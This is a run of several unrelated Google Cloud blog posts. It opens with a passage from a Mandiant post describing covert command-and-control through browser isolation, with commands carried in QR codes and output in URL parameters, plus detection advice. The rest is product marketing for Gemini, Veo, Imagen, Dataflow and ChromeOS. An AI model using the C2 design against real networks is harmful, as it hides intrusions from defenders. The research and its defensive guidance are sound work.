Instead of decoding the HTTP response for the command to execute; the implant visually renders the web page (from the browser isolation’s pixel streaming engine) and decodes the command from the QR code displayed on the page. The new C2 loop is as follows:
The implant controls a local headless browser via the DevTools protocol.
The implant retrieves the web page from the C2 server via the headless browser. This request is forwarded to the remote (isolated) browser and ultimately lands on the C2 server.
The C2 server returns a valid HTML web page with the command data encoded in a QR code (visually shown on the page).
The remote browser returns the pixel streaming engine back to the local browser, starting a visual stream showing the rendered web page obtained from the C2 server.
The implant waits for the page to fully render, then grabs a screenshot of the local browser. This screenshot contains the QR code.
The implant uses an embedded QR scanning library to read the QR code data from the screenshot, thereby obtaining the embedded data.
The implant executes the command on the compromised device.
The implant (again through the local browser) navigates to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server (after all, in legitimate cases, the URL parameters may be required to return the correct web page).The C2 server can decode the command output as in traditional HTTP-based C2.
The implant “sleeps” for a while, then repeats the cycle.
Mandiant developed a proof-of-concept (PoC) implant using Puppeteer and the Google Chrome browser in headless mode (though any modern browser could be used). We even went a step further and integrated the implant with Cobalt Strike’s External C2 feature, allowing the use of Cobalt Strike’s BEACON implant while communicating over HTTP requests and QR code responses.
Figure 3: Demo of C2 through QR codes in browser isolation scenarios (Chrome browser window would be hidden in real-world applications)
Because this technique relies on the visual content of the web page, it works in all three browser isolation types (remote, on-premises, and local).
While the PoC demonstrated the feasibility of this technique, there are some considerations and drawbacks:
During Mandiant’s testing, using QR codes with the maximum data size (2,953 bytes, 177×177 grid, Error Correction Level “L”) was infeasible as the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents. Mandiant was forced to fall back to QR codes containing a maximum of 2,189 bytes of content. Note: QR codes can store up to 2953 bytes per instance, depending on the Error Correction Level (ECL). Higher ECL settings make the QR code more easily readable, but reduce the maximum data size.
Due to the overhead of using Chrome in headless mode, the remote browser startup time, the page rendering requirements, and the stream of visual content from the remote browser back to the local browser, each request takes ~5s to reliably show and scan the QR code. This introduces significant latency in the C2 channel. For example, at the time of writing, a BEACON payload is ~323 KiB. At 2,189 bytes per QR code and 5s per request, a full BEACON payload is transferred in approximately 12m20s (~438 bytes/s, assuming every QR code can be successfully scanned and every network request goes through seamlessly).While this throughput is certainly sufficient for typical C2 operations, some techniques (e.g., SOCKS proxying) become infeasible.
Other security features of browser isolation, such as domain reputation, URL scanning, data loss prevention, and request heuristics, are not considered in this blog post. Offensive security professionals will have to overcome these protection measures as well when operating in browser isolation environments.
Conclusion and Recommendations
In this blog post, Mandiant demonstrated a novel technique to establish C2 when faced with browser isolation. While this technique proves that browser isolation technologies have weaknesses, Mandiant still recommends browser isolation as a strong protection measure against other types of attacks (e.g., client-side browser exploitation, phishing, etc). Organizations should not solely rely on browser isolation to protect themselves from web-based threats, but rather embrace the “defense in depth” strategy and establish a well-rounded cyber defense posture. Mandiant recommends the following controls:
Monitor for anomalous network traffic:Even when using browser isolation, organizations should inspect network traffic and monitor for anomalous usage. The C2 method described in this post is low-bandwidth, hence transferring even small datasets will require many HTTP requests.
Monitor for browsers in automation mode:Organizations can monitor when browsers are used in automation mode (as shown in the video above) by inspecting the process command line. Chromium-based browsers use flags such as --enable-automation and --remote-debugging-port to enable other processes to control the browser through the DevTools protocol. Organizations can monitor for these flags during process creation.
Through numerous adversarial emulation engagements and Red Team and Purple Team assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their targets. Review our Technical Assurance services and contact us for more information.
Businesses across all industries are turning to AI for a clear view of their operations in real-time. Whether it’s a busy factory floor, a crowded retail space, or a bustling restaurant kitchen, the ability to monitor your work environment helps businesses be more proactive and ultimately, more efficient.
Gemini 1.5 Pro’s multimodal and long context window capabilities can improve operational efficiency for businesses by automating tasks from inventory management to safety assessments. One powerful use case that’s emerged for developers is AI-powered kitchen analysis for busy restaurants. AI-powered kitchen analysis can benefit everyone – it can help a restaurant’s bottom line, and also train employees more efficiently while improving safety assessments that help create a safer work environment.
In this post, we’ll show you how this works, and ways you can apply it to your business.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ed1bfd67be0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Understanding multimodal AI & long context window:
Before we step into the kitchen, let’s break down what “multimodal” and “long context window” mean in the world of AI:
Multimodal AI can process and understand multiple types of data. Think of it as an AI system that can see, hear, read, and understand all at once. In our context, it can take the following forms:
Text: Recipes, orders, and inventory lists
Images: Food presentation and kitchen layouts
Audio: Kitchen commands and customer feedback
Video: Real-time cooking processes and staff movements
These data representations added together can reach GBs in size, which is where Gemini’s long context window comes into play. Long-context windows can consume millions of tokens (data points) at once. This makes it possible to input all the data mentioned above – from text to video – to generate cohesive outputs without losing any of your context.
With a projected market size of over $13 billion by 2032 and a staggering CAGR of around 30% from 2024 to 2032, multimodal plus long context window capabilities are the secret ingredients for success.
Let’s look at a real world example
When it comes to running a restaurant, AI can step in as is your inventory manager and safety inspector all rolled into one. In the following test, we fed Gemini a five-minute video of a chef preparing meals during peak operating hours.
We asked Gemini with a simple prompt to analyze the video and return multiple values that would help us analyze the meal preparation’s efficiency. First, we asked Gemini for the timestamps spent on each part of the process:
Next, to find bottlenecks and optimize workflows we asked Gemini to identify the following key moments:
Positive moments
Potential safety issues
Inventory counts
Suggestions for improvement
Together, we put these values in a graph that broke down the efficiency of each task and identified opportunities for improvement. We also asked Gemini to translate this in several different languages for a diverse kitchen staff.
The final result: Here’s how Gemini analyzed the kitchen
1. Real-time meal preparation and object tracking:
Gemini’s object detection capabilities identified ingredients and monitored cooking processes in real-time. By extracting the start and end timestamps for each meal preparation, you can precisely measure meal prep times.
2. Inventory management:
Say goodbye to the “Oops, we’re out of that” moment. By accurately tracking ingredient usage, Gemini helped prevent stock-outs and enabled proactive inventory replenishment.
3. Safety assessments:
From detecting a slippery floor to noticing an unattended flame, Gemini picked up on those details that are easy to miss. It’s not about replacing human vigilance—it’s about enhancing it, creating a safer environment for both staff and diners.
4. Multilingual capabilities:
In a global culinary landscape, language barriers can be troublesome. Gemini broke down these barriers, ensuring that whether your chef speaks Mandarin or your server speaks Spanish, everyone’s on the same page.
Gemini’s analysis of a five-minute video could help restaurants optimize operations, reduce costs, and enhance the customer experience. By automating and optimizing mundane tasks, staff can focus on what matters—creating culinary masterpieces and delivering exceptional service. It also helps businesses grow by improving cost savings – optimized inventory and resource management translate directly to a business’s financial bottom line.
And, proactive hazard detection means fewer accidents and a safer work environment. It’s not just about avoiding lawsuits—it’s about creating a culture of care.
The future is served
Gemini’s models are pioneers in the market, unlocking use cases that are made possible with Google’s research and advancements. But Gemini’s impact extends far beyond the restaurant industry – its long context window allows businesses to analyze vast amounts of data, unlocking insights that were previously too costly to attain.
Enterprises across industries are investing in AI technologies to move faster, be more productive, and give their customers the products and services that they need. But moving AI from prototype to production isn’t easy. That’s why we created Fireworks AI.
The story of Fireworks AI started seven years ago at Meta AI, where a group of innovators worked on PyTorch — an ambitious project building leading AI infrastructure from scratch. Today, PyTorch is one of the most popular open-source AI frameworks, serving trillions of inferences daily.
Many companies building AI products struggle to balance total cost of ownership (TCO) with performance quality and inference speed, while transitions from prototype to production can also be challenging. Leaders at PyTorch saw a tremendous opportunity to use their years of experience to help companies solve this challenge. And so, Fireworks AI was born.
Fireworks AI delivers the fastest and most efficient gen AI inference engine to date. We’re pushing the boundaries with compound AI systems, which replace more traditional single AI models with multiple interacting models. Think of a voice-based search application that uses audio recognition models to transcribe questions and language models to answer them.
With support from partners like NVIDIA and their incredible CUDA and CUTLASS libraries, we’re evolving fast so companies can start taking their next big steps into genAI.
Here’s how we work with Google Cloud to tackle the scale, cost, and complexity challenges of GenAI.
Matching customer growth with scale
Scale is a primary concern when moving into production, because AI moves fast. Fireworks’ customers might develop new models that they want to roll out right away or find that their demand has doubled overnight, so we need to be able to scale quickly and immediately.
While we’re building state-of-the-art infrastructure software for gen AI, we look to top partners to provide architectural components for our customers. Google Cloud’s engineering strength provides an incredible environment for performance, reliability, and scalability. It’s designed to handle high-volume workloads while maintaining excellent uptime. Currently, Fireworks processes over 140 billion tokens daily with 99.99% API uptime, so our customers never experience interruptions.
Google Kubernetes Engine (GKE) and Compute Engine are also essential to our environment, helping us run control plane APIs and manage the fleet of GPUs.
Google Cloud offers us outstanding scalability so that we’re always only using right-sized infrastructure. When customers need to scale, we can instantly meet their requests.
Since Fireworks is a member of the Google for Startups program, Google Cloud provided us with credits that were essential for growing our operations.
Stopping runaway costs of AI
Scale isn’t the only thing companies need to worry about. Costs can balloon overnight after deploying AI, and enterprises need efficient ways to scale to maintain sustainable growth. By analyzing performance and environments, Fireworks can help them balance scale and efficiency.
We use Cloud Pub/Sub and Cloud Functions for reporting and billing event processing, and Cloud Monitoring for logging analytics and alerting metrics for analytics. All the request and billing data is then stored in BigQuery, where we can analyze use and volumes for each customer model. It helps us determine if we have extra capacity, if we need to scale, and by how much.
Google Cloud’s blue-chip cloud environment also allows us to provide more to our customers without breaking budgets. Because we can offer 4X lower latency and 4X higher throughput compared to competing hosted services, we provide better performance for reduced prices. Customers then won’t need to swell their budget to increase performance, keeping TCO down.
The right environment for any customer
Every genAI solution has its own complexities and nuances, so we need to remain flexible to tailor the environment for each customer. Some enterprises might need different GPUs for different parts of a compound AI system, or they might want to deploy smaller fine-tuned models alongside larger models. Google Cloud gives us the freedom to split up tasks and use any GPUs that we need, as well as integrate with a diverse range of models and environments.
This is especially important when it comes to data privacy and security concerns for customers in sensitive industries such as finance and healthcare. Google Cloud provides robust security features like encryption and secure VPC connectivity, and it helps comply with compliance statutes such as HIPAA and SOC 2.
Meeting our customers where they are – which is a moving target – is critical to our success in gen AI. Companies like Google Cloud and NVIDIA help us do just that.
Powering innovation in gen AI
Our philosophy is that enterprises of all sizes should be able to experiment with and build AI products. AI is a powerful technology that can transform industries and help businesses compete on a global scale.
Keeping AI open source and accessible is paramount, and that’s one of the reasons we continue to work with Google Cloud. With Google Cloud, we can enable more companies to drive value from innovative uses of gen AI.
Generative AI is leading to real business growth and transformation. Among enterprise companies with gen AI in production, 86% report an increase in revenue1, with an estimated 6% growth. That’s why Google is investing in its AI technology with new models like Veo, our most advanced video generation model, and Imagen 3, our highest quality image generation model. Today, we’re building on that momentum at Google Cloud by offering our customers access to these advanced generative media models on Vertex AI:
Veo, now available on Vertex AI in private preview, empowers companies to effortlessly generate high-quality videos from simple text or image prompts. As the first hyperscaler to offer an image-to-video model, we’re helping companies transform their existing creative assets into dynamic visuals. This groundbreaking technology unlocks new possibilities for creative expression and streamlines video production workflows.
Imagen 3 will be available to all Vertex AI customers starting next week. Imagen 3 generates the most realistic and highest quality images from simple text prompts, surpassing previous versions of Imagen in detail, lighting, and artifact reduction. Businesses can seamlessly create high quality images that reflect their own brand style and logos for use in marketing, advertising, or product design.
Vertex AI provides an orchestration platform that makes it simple to customize, evaluate performance, and deploy these models on our leading infrastructure. In alignment with ourAI Principles, the development and deployment of Veo and Imagen 3 on Vertex AI prioritizes safety and responsibility with built-in precautions like digital watermarking, safety filters, and data governance.
Veo: our most capable video generation model, now available on Vertex AI
Developed by Google DeepMind, Veo generates high-quality, high-definition videos based on text or image prompts in a wide range of cinematic and visual styles with exceptional speed. With an advanced understanding of natural language and visual semantics, it generates video that closely aligns to the prompt. Veo on Vertex AI creates footage that’s consistent and coherent, so people, animals, and objects move realistically throughout shots. See examples of Veo’s image-to-video generation capabilities on Vertex AI below:
Image-to-video: Veo generates videos from existing or AI-generated images. Below are examples of how Veo uses images generated using Imagen 3 (top two images) and real-world images (bottom two images) to create short video clips.
Text-to-video: Below are examples of how Veo uses text to create short video clips.
Veo on Vertex AI empowers companies to effortlessly generate high-quality videos from simple text or image prompts. This means faster production, reduced costs, and the ability to quickly prototype and iterate on video content. Veo’s technology can be a great partner for human creativity by allowing creators to focus on higher-level tasks while AI can help handle tedious or repetitive aspects of video production. Customers like Agoda are using the power of AI models like Veo, Gemini, and Imagen to streamline their video ad production, achieving a significant reduction in production time. Whether you’re a marketer crafting engaging social media posts, a sales team creating compelling presentations, or a production team exploring new concepts, Veo streamlines your workflow and unlocks new possibilities for visual storytelling.
Imagen 3: Our highest quality image generation model, now generally available on Vertex AI
Imagen 3is our highest quality text-to-image model. It generates an incredible level of detail, producing photorealistic, lifelike images, with far fewer distracting visual artifacts than our prior models.
Starting next week, all Google Cloud customers will be able to accessImagen 3 on Vertex AI. With Imagen 3 on Vertex AI, you can generate high definition images and videos from a simple text prompt. See examples of Imagen 3’s image generation capabilities below:
Additionally, we’re making new features generally available to customers on our allowlist that help companies edit and customize images to meet their business needs. To join the allowlist, apply here.
Imagen 3 editingprovides a powerful and user-friendly way to refine and tailor any image. You can edit photos with a simple text prompt, edit only parts of an image (mask-based editing) including updating product backgrounds, or upscale the image to meet size requirements.
Imagen 3 Customization provides greater control by guiding the model to generate images with your desired characteristics. It is now possible to infuse your own brand, style, logo, subject or product features when generating new images. This opens up new creative possibilities as it accelerates development by augmenting the marketing process for advertising and marketing assets.
Build with enterprise safety and security
Designing and developing AI to be secure, safe, and responsible is paramount. Consistent with our AI Principles, Veo and Imagen 3 on Vertex AI were built with safety at the core.
Digital watermarking: Google DeepMind’s SynthID embeds invisible watermarks into every image and frame that Imagen 3 and Veo produce, helping decrease misinformation and misattribution concerns.
Safety filters:Veo and Imagen 3 both have built-in safeguards to help protect against the creation of harmful content and adhere to Google’s Responsible AI Principles. We will continue investing in new techniques to improve the safety and privacy protections of our models.
Data governance: We do not use customer data to train our models, in accordance with Google Cloud’s built-in data governance and privacy controls. Your customer data is only processed according to your instructions.
Copyright indemnity: Our indemnity for generative AI services offers peace of mind with an industry-first approach to copyright concerns.
Customers delivering value with Veo and Imagen on Vertex AI
Leading consumer packaged goods company Mondelez International, which includes brands such as Chips Ahoy!, Cadbury, Oreo, and Milka, is using generative AI to accelerate and enhance campaign content creation, allowing rapid development of consumer-ready visuals at scale for 100+ brands sold in 150 countries.
“Our collaboration with Google Cloud has been instrumental in harnessing the power of generative AI, notably through Imagen 3, to revolutionize content production. This technology has enabled us to produce hundreds of thousands of customized assets, enhancing creative quality while significantly reducing both time to market and costs. With the introduction of Veo, Mondelez and its agency partners (Accenture, Publicis, The Martin Agency, VCCP, Vayner and WPP) are poised to expand these capabilities into video content, further streamlining production processes and setting new benchmarks in marketing.” — Jon Halvorson, SVP of Consumer Experience & Digital Commerce, Mondelez International
“Mondelez is embarking on a bold journey of AI-driven transformation, partnering strategically with Google Cloud as our core AI platform. This is not simply a technology adoption; it’s a deep, collaborative partnership leveraging Google’s cutting-edge AI capabilities and infrastructure to fuel our innovation and growth ambitions. This partnership reinforces Mondelez’s commitment to continuous adoption of leading-edge technology to advance our business capabilities.” — Tiffani Sossei, SVP Chief Digital Experience Officer, Mondelez International
WPP is a world leader in marketing and communication services. Its AI-powered operating system for marketing transformation, WPP Open, already utilizes Imagen 3 for image generation and will soon incorporate Veo for video generation, streamlining the ideation and production of content. This expansion empowers WPP to unlock even greater levels of creativity and efficiency.
“At WPP, we believe in the transformative power of AI to enable our people to do their best work. We built WPP Open from the ground up and leverage Google Cloud’s AI capabilities within it to help bring to life the creative vision of clients such as L’Oréal, resulting in the production of compelling content and making iteration and concepting easier than ever before. With Veo and Imagen, we are narrowing the gap between imagination and execution, enabling our people to develop high-quality, photo-realistic, campaign-ready visuals in a matter of minutes.” – Stephan Pretorius, Chief Technology Officer, WPP
Agoda is a digital travel platform that helps travelers see the world for less with its great value deals on a global network of over 4.5M hotels and holiday properties worldwide, plus flights, activities, and more. They’re now testing Imagen and Veo on Vertex AI to create visuals, allowing Agoda teams to generate unique images of travel destinations which would then be used to generate videos.
Example of how Agoda’s marketing team used AI models like Veo and Imagen to help create a promotional video.
“At Agoda, we’re committed to helping people see the world for less and making travel experiences more accessible. We are exploring the media generation capabilities of Google Cloud AI, using Imagen to create unique visuals of dream destinations in various styles. These images are then brought to life as videos through experiments with Veo’s image-to-video technology. These technologies hold the potential to streamline our content creation process from days to hours. By continuing our testing, we aim to explore how this combination can enhance creative possibilities and personalized advertising efficiently. With these tools, we hope to engage customers meaningfully and inspire future adventures.” – Matteo Frigerio, Chief Marketing Officer, Agoda
Quora, a leading online platform for people worldwide to share knowledge and learn from each other, has developed Poe, a platform that allows users to interact with leading gen AI models, including Gemini, Imagen, and now Veo through Vertex AI. With Veo and Imagen, Poe users can unlock new levels of creativity and bring their ideas to life with incredible ease and speed.
“We created Poe to democratize access to the world’s best gen AI models. With Veo, we’re now enabling millions of users to bring their ideas to life through stunning, high-quality generative video. Through partnerships with leaders like Google, we’re expanding creative possibilities across all AI modalities. We can’t wait to see what our community creates with Veo.” – Spencer Chan, Product Lead, Poe by Quora
Honor is a leading global provider of smart devices. They are now bringing the power of AI image generation directly to consumers’ fingertips by integrating Imagen into millions of smartphones. This allows users to easily enhance and customize their photos with features like outpainting and stylization.
“At Honor, we’re committed to delivering cutting-edge technology that our millions of users can implement to enhance their daily lives. We chose to integrate Imagen on Vertex AI because it provides outstanding image generation capabilities that are both powerful and user-friendly. With Imagen, our customers can effortlessly create, edit, and reimagine images directly on their smartphones, transforming everyday moments into extraordinary visuals. We look forward to innovating with Google Cloud as their latest generative media models continue to push the boundaries of creative expression.” – George Zhao, CEO, Honor
Get started
To get started with Veo on Vertex AI, reach out to your Google Cloud account representative. To get started with Imagen on Vertex AI, find our documentation. You’ll be able to access Imagen 3 on Vertex AI starting next week.
At the Gemini for Work event in September, we showcased how generative AI is transforming the way enterprises work. Across all the customer innovation we saw at the event, one thing was clear – if last year was about gen AI exploration and experimentation, this year is about achieving real-world impact.
Gen AI has the potential to revolutionize how we work, but only if its output is reliable and relevant. Large language models (LLMs), with their knowledge frozen in time during training, often lack access to the latest information and your internal data. In addition, they are by design creative and probabilistic, and therefore prone to hallucinations. And finally, they do not offer built-in source attribution. These limitations hinder their ability to provide up-to-date, contextually relevant and dependable responses.
To overcome these challenges, we need to connect LLMs with sources of truth. This is where concepts like grounding, retrieval augmented generation (RAG), and search come into play. Grounding means providing an LLM with external information to root its response in reality, which reduces the chances of it hallucinating or making things up. RAG is a specific technique for grounding that finds relevant information from a knowledge base and gives it to the LLM as context. Search is the core retrieval technology behind RAG, as it’s how the system finds the right information in the knowledge base.
To unlock the true potential of gen AI, businesses need to ground their LLMs in what we at Google call enterprise truth. These are trusted internal data across documents, emails and storage systems, third party applications, and even fresh information from the internet that helps knowledge workers perform their jobs better.
By tapping into your enterprise truth, grounded LLMs can deliver more accurate, contextually relevant, and up-to-date responses, enabling you to use generative AI for real-world impact. This means enhanced customer service with more accurate and personalized support, automated tasks like generating reports and summarizing documents with greater accuracy, deeper insights derived from analyzing multiple data sources to identify trends and opportunities, and ultimately, driving innovation by developing new products and services based on a richer understanding of customer needs and market trends.
Now let’s look at how you can easily overcome these challenges with the latest enhancements from Vertex AI, Google Cloud’s AI platform.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7114e8c490>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Tap into the latest knowledge from the internet
LLMs have a fundamental limitation: their knowledge is anchored to the data they were trained on, which becomes outdated over time. This will impact the quality of response for any question that needs fresh data – the latest news, company 10K results, dates for a sports event or a concert. Grounding with Google Search allows the language model to find fresh information from the internet. It even provides source links so you can fact check or learn more. Grounding with Google Search is offered with our Gemini models out-of-the-box. Just toggle to turn it on, and Gemini will ground the answer using Google Search.
If you’re not sure if your next request requires grounding with Google Search, you can now use the new “dynamic retrieval” feature. Just turn it on and Gemini will interpret your query and predict whether it needs up-to-date information in order to increase the accuracy of the answer. You can set the prediction score threshold on when Gemini will be triggered to use grounding with Google Search.This means you get the best of both worlds: high-quality results when you need them, and lower costs, because Gemini will only tap Google Search when needed for your users’ query.
Connect data across all your enterprise truth
Connecting to fresh facts is just the start. The value for any enterprise is grounding in their proprietary data. RAG is a technique that enhances LLMs by connecting them to non-training data sources, helping them to retrieve information from this data before generating a response. There are several options available for RAG, but many of those don’t work for enterprises because they either lack in quality, reliability, or scalability. The quality of grounded gen AI apps can only be as good as their ability to retrieve your data.
That’s where Vertex AI comes in. Whether you are looking for a simple solution that works out-of-the-box, want to build your own RAG system with APIs, or use highly performative vector embeddings for RAG, Vertex AI offers a comprehensive set of offerings to help meet your needs.
Here’s an easy guide to RAG for the enterprise:
First, use out-of-the-box RAG for most enterprise applications: Vertex AI Search simplifies the end-to-end information discovery process with Google quality RAG aka search. With Vertex AI Search, Google Cloud manages your RAG service and all the various parts of building a RAG system: Optical Character Recognition (OCR), data understanding and annotation, smart chunking, embedding, indexing, storing, query rewriting, spell checking, and so on. Vertex AI search connects to your data including your documents, your websites, your databases, structured data, and also third party apps like JIRA and Slack with built in connectors. The best part is that it can be set up in just a few minutes
Developers can get a taste of grounding with Google Search and enterprise data in the Vertex Grounded Generation playground on Github where you can compare grounded and ungrounded responses to queries side by side.
Then, build your own RAG for specific use cases: If you need to build your own RAG system, Vertex AI offers the various pieces off the shelf as individual APIs for layout parsing, ranking, grounded generation, check grounding, text embeddings and vector search. The layout parser can transform unstructured documents into structured representations and comes with multimodal understanding of charts and figures, which significantly enhances search quality across documents – like PDFs with embedded tables and images, which are challenging for many RAG systems.
Our vector search offering is particularly valuable for enterprises who need custom highly performant embeddings based information retrieval. Vector search can scale to billions of vectors, can find the nearest neighbors in a few milliseconds making it suitable for the needs of the large enterprises. Vector search now offers hybrid search that combines both embeddings and semantic search technologies to ensure the most relevant and accurate responses for your users.
No matter how you build your gen AI apps, thorough evaluation is essential to ensure they meet your specific needs. The gen AI evaluation service in Vertex AI empowers you to go beyond generic benchmarks and define your own evaluation criteria. This means you get a truly accurate picture of how well a model aligns with your unique use case, whether it’s generating creative content, or analyzing documents.
Moving beyond the hype for real world impact
The initial excitement surrounding gen AI has given way to a more pragmatic focus on real-world applications and tangible business value. Grounding is important for achieving this goal, ensuring that your AI models are not just generating text, but generating insights that are grounded in your unique enterprise truth.
Alaska Airlines is developing natural language search, providing travelers with a conversational experience powered by AI that’s akin to interacting with a knowledgeable travel agent. This chatbot aims to streamline travel booking, enhance customer experience, and reinforce brand identity.
Motorola Mobility’s Moto AI leverages Gemini and Imagen to help smartphone users unlock new levels of productivity, creativity, and enjoyment with features such as conversation summaries, notification digests, image creation, and natural language search — all with reliable responses grounded in Google Search.
Cintas is using Vertex AI Search to develop an internal knowledge center for customer service and sales teams to easily find key information.
Workday is using natural language processing in Vertex AI to make data insights more accessible for technical and non-technical users alike.
By embracing grounding, businesses can unlock the full potential of gen AI and lead the way in this transformative era. To learn more, check out my session from Gemini at Work where I cover our grounding offerings in more detail. Download our ebook to see how better search (including grounding) can lead to better business outcomes.
At PayPal, revolutionizing commerce globally has been a core mission for over 25 years. We create innovative experiences that make moving money, selling, and shopping simple, personalized, and secure, empowering consumers and businesses in approximately 200 markets. Ensuring the availability of services offered to both merchants and consumers is paramount.
PayPal’s journey with Dataflow has been a success – empowering the company to overcome streaming analytics challenges, unlock new opportunities, and build a more reliable, efficient, and scalable observability platform.
The observability platform team at PayPal is responsible for providing a telemetry platform for developers, technical account teams, and product managers. They own the SDKs, open telemetry collectors, and data streaming pipelines for receiving, processing, and exporting metrics and traces to their backend. PayPal developers rely on this observability platform for telemetry data to detect and fix problems in the shortest possible time. With applications running on diverse stacks like Java, Go, and Node.js, producing around three petabytes of logs per day, a robust, high-throughput, low-latency data streaming solution is critical for generating log-based metrics and traces.
Until 2023, PayPal’s observability platform used a self-managed Apache Flink-based infrastructure for streaming logs-based pipelines that generated metrics and spans. However, this solution presented several challenges:
Reliability: The system was highly unreliable, with no checkpointing in most pipelines, leading to data loss during restarts.
Efficiency: Managing the system was expensive and inefficient. Pipelines had to be planned for peak load, even if it occurred infrequently.
Security: The deployment needed to better conform to security guidelines.
Cluster management: Cluster creation and maintenance were manual tasks, requiring significant engineering time.
Community Support: The solution was proprietary, limiting community support and collaboration.
Software upgrades: Customizations required updating the binary, which was no longer supported.
Long-term support: The solution was an end-of-sale product, placing business continuity at risk.
PayPal needed a cloud-native solution that could address these challenges and unlock new opportunities. Their key requirements included:
Effortless scalability: Handling massive data volumes and fluctuating workloads with automatic scaling and resource optimization.
Cost reduction: Optimizing resource utilization and eliminating costly infrastructure management.
Seamless integration: Connecting with other data and AI tools within PayPal’s ecosystem.
Empowering real-time AI/ML: Leveraging advanced streaming ML capabilities for data enrichment, model training, and real-time inference.
After extensive research and a successful proof of concept, PayPal decided to migrate to Google Cloud’s Dataflow. Dataflow is a fully managed, serverless streaming analytics platform built on Apache Beam, offering unparalleled scalability, flexibility, and cost-effectiveness.
The migration process involved several key steps:
Initial POC: PayPal tested and validated Dataflow’s capabilities to meet their specific requirements.
Pipeline Optimization: Working with Google Cloud experts, PayPal fine-tuned pipelines for maximum efficiency, including redesigning the partitioning scheme and optimizing data shuffling.
Technical Benefits
Dataflow’s automatic scaling capabilities ensure consistent performance and cost efficiency by dynamically adjusting resources based on real-time data demands. Its robust state management capabilities enable accurate and reliable real-time insights from complex streaming operations, while its ability to process data with minimal latency provides up-to-the-minute insights for faster decision-making. Additionally, Dataflow’s comprehensive monitoring tools and integration with other Google Cloud services simplify troubleshooting and performance optimization.
Fig 2. An example image of the execution details tab showing data freshness by stage over time, providing anomaly warnings in data freshness.
Business benefits
The serverless architecture and dynamic resource allocation of Dataflow have significantly reduced infrastructure and operational costs for PayPal. They’ve also seen enhanced stability and uptime of critical streaming pipelines, leading to greater business continuity. Furthermore, Dataflow’s simplified programming model and rich tooling have accelerated development and deployment cycles, boosting developer productivity.
Implementing a high-throughput, low-latency streaming platform is critical to providing high cardinality analytics to business, developers and our command center teams. The dataflow integration has now empowered our engineering teams with a strong platform to monitor paypal.com 24 x 7 thereby ensuring PayPal is highly available for our consumers and merchants.
Perhaps most importantly, Dataflow has freed up PayPal’s engineering resources to focus on high-value initiatives. This includes integrating with Google BigQuery for real-time Failed Custom Interaction (FCI) analytics, providing the Site Reliability Engineering team with immediate insights. They’re also implementing real-time merchant monitoring, analyzing high-cardinality merchant API traffic for enhanced insights and risk management.
PayPal is excited to continue exploring Dataflow’s capabilities and further leverage its power to drive innovation and deliver exceptional experiences for their customers.
Back in January of 2020, we announced the availability of IBM Power Systems for Google Cloud. But while the pandemic accelerated cloud computing adoption, many large enterprises still faced challenges with critical workloads such as those often found on the Enterprise IBM Power platform.
At the beginning of 2022, we partnered with Converge Technology Solutions, a company with deep expertise in this market, to expand our support for customers with IBM Power Workloads. Converge was already an important partner and they have upgraded the service by enhancing network connectivity to Google Cloud along with bringing full support to the IBM i operating system.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7115bf7250>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Today, Converge Enterprise Cloud with IBM Power for Google Cloud, or simply IP4G, supports all three major environments for Power: AIX, IBM i and Linux. In addition, it’s now available in four new regions in production — two in Canada and two in EMEA, bringing the total to six:
Based on these developments and Converge’s expert engagement, we have seen a tremendous increase in customer adoption for IP4G.
“Infor was one of the original IP4G subscribers, and years later, we continue to run mission-critical IBM Power workloads in IP4G for our clients. IP4G’s availability and performance have more than met our requirements, and we are extremely satisfied with our overall IP4G experience.” – Scott Vassh, Vice President, WMS Development
Are you thinking of moving your IBM Power workloads to the cloud? For questions and information regarding custom cloud plans, please reach out to power4gcp@googlegroups.com. Your email is private to Converge and Google Cloud representatives, who will follow up with you. Looking for a bit more information first? Check out our data center migration and mainframe modernization solution webpages.
Saturday, November 30, 2024, is Small Business Saturday, a day where we celebrate and support small businesses and their impact on our economy and local communities. Like many small businesses, Google was built in a garage with the spirit of doing things differently.1 We are committed to providing tools and services that support local small businesses.2
Small businesses create jobs, drive innovation and contribute to the overall well-being of communities. In fact, 99.9% of American businesses are small.2 In addition, small businesses employ 45.9% of American workers, or about 59 million people, and make up 43.5% of US Gross Domestic Product (GDP).3
In addition to creating jobs for local talent, small businesses also directly give back to their communities by contributing tax revenues and supporting community based programs. Local charity programs rely on the help from their local small businesses through sponsorship, volunteer, and fundraising efforts.4 With the support of their local chamber of commerce, small businesses are deeply ingrained in their local communities generating social and economic good.
Like any organization, small businesses rely on technology to run their business. But when small businesses are time and resource-strapped, it can be difficult to get the best of technology. For instance, small businesses are three times more likely to be targeted by cyber criminals,5 and in a recent study, IT managers indicated they have to spend up to half their work week securing and managing devices.6 How can small businesses keep up? We believe it is critical to help small businesses be successful with devices that are secure, simpler to manage, and affordable.
How ChromeOS empowers small businesses
ChromeOS, the OS at the heart of every ChromeOS device, is designed to keep businesses safe, simplify IT management and save businesses money.
Security ChromeOS is the most secure OS out of the box.7 In other words, you are protected from the moment you boot up the machine without having to add any antivirus software. In fact, there have been zero reported instances of successful virus or ransomware attacks on ChromeOS devices as of 2024.*
Calbag Metals is a West Coast leader in scrap metal recycling and is located in Portland, Oregon. Calbag’s mission is protecting the environment, recycling the past, and preserving the future. The business has been led by three family generations. As the business grew, they started to face integration challenges with a wide range of devices to manage, spending a significant amount of their work week on management. Recognizing the security benefits of ChromeOS, like not storing files locally, automatic updates, and easily blocking apps across all devices from one place, Calbag made the switch to ChromeOS.
We’re happy to leave the security to Google. The updates to ChromeOS are automatic and run in the background, so there’s no need to visit every workstation to confirm security,
Jim Perris
Senior Vice President of Finance and Operations, Calbag Metals
